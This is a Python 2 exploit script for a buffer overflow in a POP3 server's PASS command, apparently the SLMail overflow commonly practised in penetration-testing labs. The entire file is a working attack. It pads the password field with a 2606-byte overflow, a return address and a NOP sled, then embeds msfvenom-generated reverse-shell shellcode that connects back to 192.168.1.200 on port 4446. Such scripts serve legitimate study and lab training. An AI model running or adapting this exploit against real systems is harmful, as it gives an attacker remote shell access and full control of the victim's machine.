#!/usr/bin/python
#buffer to remain 3000 bytes

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows -b '\x00\x0A\x0D' LPORT=4446 LHOST=192.168.1.200 -e x86/shikata_ga_nai -f python
#Payload size: 351 bytes
#Final size of python file: 1684 bytes
buf =  ""
buf += "\xb8\x6e\x2c\x75\xd7\xdb\xc3\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc\x03\x2c\x22\x97"
buf += "\x22\x4c\xd2\xd5\xcd\xac\x23\xba\x44\x49\x12\xfa\x33"
buf += "\x1a\x05\xca\x30\x4e\xaa\xa1\x15\x7a\x39\xc7\xb1\x8d"
buf += "\x8a\x62\xe4\xa0\x0b\xde\xd4\xa3\x8f\x1d\x09\x03\xb1"
buf += "\xed\x5c\x42\xf6\x10\xac\x16\xaf\x5f\x03\x86\xc4\x2a"
buf += "\x98\x2d\x96\xbb\x98\xd2\x6f\xbd\x89\x45\xfb\xe4\x09"
buf += "\x64\x28\x9d\x03\x7e\x2d\x98\xda\xf5\x85\x56\xdd\xdf"
buf += "\xd7\x97\x72\x1e\xd8\x65\x8a\x67\xdf\x95\xf9\x91\x23"
buf += "\x2b\xfa\x66\x59\xf7\x8f\x7c\xf9\x7c\x37\x58\xfb\x51"
buf += "\xae\x2b\xf7\x1e\xa4\x73\x14\xa0\x69\x08\x20\x29\x8c"
buf += "\xde\xa0\x69\xab\xfa\xe9\x2a\xd2\x5b\x54\x9c\xeb\xbb"
buf += "\x37\x41\x4e\xb0\xda\x96\xe3\x9b\xb2\x5b\xce\x23\x43"
buf += "\xf4\x59\x50\x71\x5b\xf2\xfe\x39\x14\xdc\xf9\x3e\x0f"
buf += "\x98\x95\xc0\xb0\xd9\xbc\x06\xe4\x89\xd6\xaf\x85\x41"
buf += "\x26\x4f\x50\xc5\x76\xff\x0b\xa6\x26\xbf\xfb\x4e\x2c"
buf += "\x30\x23\x6e\x4f\x9a\x4c\x05\xaa\x4d\xb3\x72\xb5\x45"
buf += "\x5b\x81\xb5\x44\xc2\x0c\x53\x0c\xea\x58\xcc\xb9\x93"
buf += "\xc0\x86\x58\x5b\xdf\xe3\x5b\xd7\xec\x14\x15\x10\x98"
buf += "\x06\xc2\xd0\xd7\x74\x45\xee\xcd\x10\x09\x7d\x8a\xe0"
buf += "\x44\x9e\x05\xb7\x01\x50\x5c\x5d\xbc\xcb\xf6\x43\x3d"
buf += "\x8d\x31\xc7\x9a\x6e\xbf\xc6\x6f\xca\x9b\xd8\xa9\xd3"
buf += "\xa7\x8c\x65\x82\x71\x7a\xc0\x7c\x30\xd4\x9a\xd3\x9a"
buf += "\xb0\x5b\x18\x1d\xc6\x63\x75\xeb\x26\xd5\x20\xaa\x59"
buf += "\xda\xa4\x3a\x22\x06\x55\xc4\xf9\x82\x65\x8f\xa3\xa3"
buf += "\xed\x56\x36\xf6\x73\x69\xed\x35\x8a\xea\x07\xc6\x69"
buf += "\xf2\x62\xc3\x36\xb4\x9f\xb9\x27\x51\x9f\x6e\x47\x70"

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + buf + "D" * 31

try:
	print "\nSending evil buffer..."
	s.connect(('192.168.1.192',110))
	data = s.recv(1024)
        print data
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
        print data
	s.send('PASS ' + buffer + '\r\n')
	print "\nDone!."
except:
    print "Could not connect to POP3!"